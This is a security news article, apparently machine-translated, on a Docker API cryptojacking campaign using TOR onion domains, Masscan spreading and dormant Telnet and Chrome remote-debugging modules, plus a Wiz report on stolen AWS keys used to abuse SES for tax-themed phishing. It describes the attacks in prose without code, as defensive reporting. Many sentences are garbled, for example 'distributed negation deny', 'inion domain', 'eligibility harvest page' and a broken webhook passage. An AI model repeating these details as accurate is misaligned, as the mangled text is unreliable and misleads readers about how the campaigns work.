Cybersecurity researchers have discovered a variant of a recently disclosed campaign that abuses the TOR network for cryptojacking attacks targeting exposed Docker APIs.
Akamai, who discovered the latest activity last month, said it was designed to block other actors from accessing the Docker API from the Internet.
The findings were built on a previous report from Trend Micro in late June 2025, and discovered a malicious campaign that targeted exposed Docker instances to secretly drop Xmrig Cryptocurrency Miner using the TOR domain for anonymity.
“This new strain appears to use similar tools to the original, but may have different end goals, including the possibility of setting the foundations for complex botnets,” said security researcher Yonatan Gilvarg.
Attack chains essentially involve intruding into misunderstood Docker APIs to run a new container based on the Alpine Docker image and mount the host file system on it. This is followed by a threat actor running a base64-encoded payload downloading the shell script downloader from the A.Onion domain.
In addition to changing the SSH configuration to set up persistence, the script also installs other tools such as Masscan, Libpcap, Libpcap-Dev, ZSTD, Torsock and performs reconnaissance, contacts the Command and Control (C2) server, and the second. Download the compressed binary from the inion domain.
“The files that were originally downloaded will not communicate to the Internet as they are GO-written droppers that contain the content they want to drop,” explained Gilvarg. “We parse the UTMP file to find out who is currently logged in to the machine, except that we drop another binary file.”
Interestingly, the source code for the binary file contains emojis that depict users signed in to the system. This indicates that the artifacts may have been created using a large language model (LLM).
Dropper also launches Masscan to transmit infections to those machines by repeating the same process as scanning the Internet for Open Docker API services on port 2375 and creating containers with Base64 commands.
Additionally, the binary includes two more port checks: 23 (Telnet) and 9222 (remote debug port for chrome browser). The capabilities that spread through these ports are not yet fully embodied.
Telnet attack methods involve using a set of known default router and device credentials for brute force logins to ensure successful attempts to sign in to the webhook.[.]A site endpoint with details about the destination IP address and victim authentication credentials.
On port 9222, the malware interacts with the web browser using a GO library named ChromedP. Previously, North Korean threat actors have communicated with C2 servers, communicated with Stealer Malware, bypassed Chrome’s app-binding encryption, and remotely connected to Chromium Sessions, Siphon cookies and other private data.
It then connects to an existing session using an open remote port, and eventually sends the post to the same .Onion domain that is used to retrieve the shell script downloader, using information about the source IP address where the malware is located and the destination that can access port 9222.
Details are sent to an endpoint named “httpbot/add” where devices with exposed remote debug ports can register devices with remote debug ports for chrome/chrome with botnets to provide additional payloads that can steal data, or to perform distributed negation deny (DDOS) attacks.
“The malware scans only port 2375, so the logic to handle ports 23 and 9222 is currently unreachable and cannot be executed,” Gilvalg said. “However, implementations may exist and indicate future capabilities.”
“Attackers have great control over systems affected by abused APIs. Segmenting networks, limiting service exposure to the Internet, and ensuring default credentials cannot be overstated. By adopting these measures, organizations can significantly reduce vulnerability to such threats.”
Wiz Flags AWS SES Abuse Campaign
This disclosure was made by cloud security company Wiz in detail in May 2025, using its Amazon Simple Email Service (SES) campaign, using its Amazon Web Services (AWS) access keys as launchpads for mass phishing attacks.
Currently, I don’t know how the key was obtained. However, there are various ways that attackers can achieve this. An accidental public exposure of a code repository, or theft through an incorrect asset or from a developer workstation using Stealer Malware.
“Attackers use the compromised key to access the victim’s AWS environment, bypass the built-in restrictions of SES, verify the identity of the new “sender” and prepare and carry out phishing operations in an orderly manner,” said Wiz researchers Itay Harel and Hila Ramati.
Wiz, who worked with Proofpoint to further explore the phishing campaign, said the email was targeted at several organizations across multiple regions and sectors, and adopted tax-themed lures to redirect recipients to the eligibility harvest page.
“If SES is configured with an account, an attacker can send emails from a verified domain,” Wiz warned. “Beyond brand damage, this allows for phishing that appears to come from you, and can be used to spear, fraud, theft of data or decoration in business processes.”
Source link
